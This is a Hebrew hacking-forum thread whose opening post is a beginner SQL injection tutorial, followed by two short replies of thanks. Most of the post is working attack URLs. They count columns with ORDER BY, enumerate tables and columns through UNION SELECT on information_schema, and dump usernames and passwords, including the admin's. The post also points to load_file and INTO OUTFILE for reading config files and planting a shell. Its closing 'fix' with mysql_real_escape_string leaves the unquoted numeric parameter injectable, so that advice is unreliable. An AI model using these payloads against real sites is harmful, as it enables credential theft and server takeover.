קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] מדריך התקפת sql injection
    על ידי roee147 בפורום האקינג ואבטחת מידע
    תגובות: 12
    הודעה אחרונה: 01-02-2012, 02:19
  2. [פרסום] מדריך התקפת SQL INJECTION
    על ידי UnioN-ofSite בפורום האקינג ואבטחת מידע
    תגובות: 3
    הודעה אחרונה: 28-05-2011, 18:23
  3. [פרסום] מדריך SQL INJECTION של pr0xy !
    על ידי Num32 בפורום האקינג ואבטחת מידע
    תגובות: 4
    הודעה אחרונה: 31-01-2011, 22:15
  4. [בקשה] שתעשו מדריך SQL INJECTION למסד MSSQL
    על ידי Reggae-Man בפורום האקינג ואבטחת מידע
    תגובות: 13
    הודעה אחרונה: 17-08-2010, 13:16
  5. [מכירה] מדריך לפריצה לאתרים עם SQL INJECTION | תציעו נק'
    על ידי Reggae-Man בפורום מכירה
    תגובות: 5
    הודעה אחרונה: 16-08-2010, 15:50
+ תגובה לנושא
מציג תוצאות 1 עד 3 מתוך 3

מדריך לBasic SQL Injection

  1. #1
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל מדריך לBasic SQL Injection

    מדריך לBasic SQL Injection
    פרקים:
    1.מזה בעצם ? אפשר דוגמא לקוד בקשה ?
    2.ניצול הפריצה
    3.רק שליפת נתונים ? זה הכל ?
    4.סגירת הפריצה
    מזה בעצם ? אפשר דוגמא לקוד בקשה ?
    אז מזה?
    פריצת מסד נתונים ,SQL Vulentiniy.
    מאפשר גישה מלאה למסד + לשרת .
    משגיאה אחת קטנה של המתכנת להשגת ROOT על היעודי.
    איך זה עובד?
    קוד PHP:
    <?php
    $query
    ="SELECT text FROM pages WHERE pageid=$_GET['id']";
    mysql_fetch_array($quert);
    ?>
    בעקרון ככה.
    עכשיו מה אנחנו עושים?
    עורכים את המשתנה ID לשליפת נתונים אחרים כגון ססמאות מהטבלה users.
    בפרק הבא נלמד איך לנצל את הפריצה ,ממליץ ללמוד SQL קודם.
    ניצול הפריצה
    איך אני מנצל את הפריצה לעזאזל?!!?
    אז...
    הינה המדריך ^_^
    [ CODE]http://www.site.com/index.php?id=1 order by 1-- no error
    http://www.site.com/index.php?id=1 order by 2-- no error
    http://www.site.com/index.php?id=1 order by 3-- no error
    http://www.site.com/index.php?id=1 order by 4-- no error
    http://www.site.com/index.php?id=1 order by 5-- error[/CODE]
    גילנו את מספר הטורים בטבלה pages.
    כעת נשלוף.
    קוד:
    http://www.site.com/index.php?id=-1 UNION SELECT 1,2,3,4--
    נשלוף את הטבלאות.
    קוד:
    http://www.site.com/index.php?id=-1 UNION SELECT 1,table_name,3,4  FROM information_schema.tables
    כמובן שאפשר להשתמש בcontent() או group_content או אפילו עם WHERE לשפר את הנוחות.
    אני לא אפרט על זה כאן.
    אוקיי נבחר את הטבלה users.
    קוד:
    http://www.site.com/index.php?id=-1 UNION SELECT 1,column_name,3,4  FROM information_schema.columns WHERE table_name='users'
    כעת נשלוף את הטורים הרצויים ,username password.
    קוד:
    http://www.site.com/index.php?id=-1 UNION SELECT  1,username,0x3a,password,3,4 FROM users
    כמובן שאפשר לשלוף ממשתמש רצוי
    קוד:
    http://www.site.com/index.php?id=-1 UNION SELECT  1,username,0x3a,password,3,4 FROM users WHERE username=admin
    וזהו שלפנו תנתונים.
    רק שליפת נתונים ? זה הכל ?
    לא ,בכלל לא.
    משהראתי לכם זה רק חלק קטן מימה שאפשר לעשות עם הפריצה ,כמו בשאר המדריכים שלי.
    אפשר להשתמש בפונקצית load_file כדי לייבא קובץ כמו config.php ואפילו להעלאות שאל ולקבל ROOT עם SELECT INTO OUTFILE.
    אני לא אפרט על הכל במדריך זה. אבל אני נותן לכם כיוונים ,רעיונות : ).
    סגירת הפריצה
    קוד PHP:
    <?php
    $id
    =mysql_real_escape_string($_GET['id']);
    $query="SELECT text FROM pages WHERE pageid=$id";
    mysql_fetch_array($query);
    ?>

    עד כאן המדריך שלי!
    תהנו!




  2. קישורים ממומנים

  3. #2
    משתמש מתחיל האוואטר של _vi7ut_
    שם פרטי
    TheOnlyOne
    תאריך הצטרפות
    04/2011
    הודעות
    116
    לייקים
    1
    נקודות
    0
    משפט מחץ
    For being a real pro, you need a real friends
    מין: זכר

    ברירת מחדל

    תודה מוכר וידוע.


  4. #3
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    כמו שכבר ציינו מוכר...תודה בכ"מ יעזור למתחילים

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 02:32.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,449,538 | הודעות: 8,150,120 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect